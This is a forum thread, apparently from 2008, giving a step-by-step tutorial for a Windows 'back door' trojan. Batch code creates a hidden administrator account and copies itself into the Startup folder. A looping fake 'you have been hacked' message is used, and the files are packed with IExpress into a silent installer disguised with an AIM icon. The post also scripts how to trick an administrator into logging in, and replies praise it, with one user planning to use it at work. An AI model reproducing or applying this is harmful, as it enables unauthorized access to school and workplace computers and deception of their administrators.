network monitoring
+ Reply to Thread

Thread: The back door batch

The back door batch

before i continue i must state that i have no intensions of using my knowledge for any malicious intent AND this tutorial is for EDUCATIONAL PURPOSES ONLY!! meaning if you do it and get in trouble, don't blame it on me

ok many of you guys have restricted user access in school,work place, and even a very bad ******* cyber cafe/library. many of these restrictions are caused by the simple "restricted user" option and in many places, your user account is "customly" ******* by the group policy and such..now what we are about to do requires a bit of social engeneering and a simple bat/exe file that we are going to make. now lets start on our batch file.
    (open up notepad by start->run->notepad)

lets start the batch
    Code:
    @echo off
    for those of you who do not know what some of these commands mean..please look at my first batch file tut [URL="http://www.all-nettools.com/forum/showthread.php?t=6*0*"]HERE[/URL]

now first we are going to add the new user which in this case, is going to be cybernin
    Code:
    @echo off
    net user cybernin tico /add
    this command will create the new username named "cyberin" with the password "tico". this command alone will not create give us administrator privliges so we must add ourselves as admins with this code
    Code:
    net localgroup administrators cybernin /add
    now in total we should have:
    Code:
    @echo off
    net user cybernin tico /add
    net localgroup administrators cybernin /add
    save it as "newuser.bat"

ok at the current moment if you run this batch file you will get the access denied 5 error code thing soooo lets make a "fake" virus. open up notepad
    again and start it off.

Code:
    @echo off
    :start
    call msg * "YOU HAVE BEEN HACKED!!! WE DETECT THAT YOUR RUNNING ON A RESTRICTED USER MACHINE, HAHAHA! THE ONLY WAY TO STOP THIS IS BY LOGING IN AS A USER WITH ADMIN PRIVLIGES AND REMOVE ME FROM THE REGISTRY..HA GOOD LUCK NEWBBZZZ"
    GOTO start
    now that we have this, lets save it as message.bat

so now we have newuser.bat and message.bat
    lets make two batch files to start up both processes the way we want them to start. one of the batch files should have
    save this as start*.bat
    Code:
    @echo off
    start newuser.exe
    copy "newuser.exe" "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"
    and the other one should be named start2.bat with the following code

Code:
    @echo off
    start message.exe
    now were going to make them exe's using the converter on the link provided above.

make newuser.bat, message.bat, start*.bat, and start2.bat in to exe's (each one an exe so the output is newuser.exe, message.exe, start*.exe, and start2.exe

now lets open up windows packager (start->run->iexpress)

now create a new self extraction then click next
    select extract and install (the first choice Buzzo) then next
    give it a random title
    then no promt then next
    no license..next
    ah now we add our start*.exe, start2.exe,message.exe and newuser.exe in to this wonderful white box and click next
    on the box that says install program select start*.exe then for the bottom select start2.exe
    click next
    select hidden then next
    no message, next
    now check hide process animation from user and click browse to save it and give it a name like above
    no restart, next
    don't save if you do then save i don't care, next
    then create and your exe will be created.. NOW! look at the fugly icon..
    use my icon changer and look for an AIM icon or something to make it beleive able, my icon changer is pretty self explanatory (and not..its really not mine) so i don't feel like getting into the icon changer since even a stupid one can do it. your .exe is now alive and kicking.

now we go to the target computer and make sure that person with the admin pass is around and launch the program we made..it should copy itself to startup and open the message boxes NOW to go tell your admin.."hey something up with the comp..it says i have to log in as admin or something.." they go up to the comp put in theyre information and as soon as they start, BAM you have your very own username =)

hope you liked this tut

thanks again to

myspace
    syntax (gave me first codes for admin =))
    m00nbat (his name really makes me want to talk to him for some reason..)
    CPL.T tought me everything i know
    Last edited by teknicalissue; 07-17-2008 at 11:45 AM.
    Yes..i do wear a grey hat... and don't plan on changing to white or black..

Another good tut for getting admin, but I'll have to rate this one lower because it involves some degree of social engineering (i.e. lying, tricking) to get the admin to login as administrator. So, 8/*0 for this one. But still, keep up the good work.

Which reminds me, I need to start writing some tuts...
    "Workers of the world unite; you have nothing to lose but your chains." -Karl Marx

thanks m00nbat, one more thing if you (not addressing to m00nbat specificly) don't feel comfortable about the whole social engeneering thing just leave it in the start up and return within a week lol sooner or later the must have loged in as admin i will now write another tut lol

you Good .. i Will try this in a computer work

cool

let me know how it works out =)

+ Reply to Thread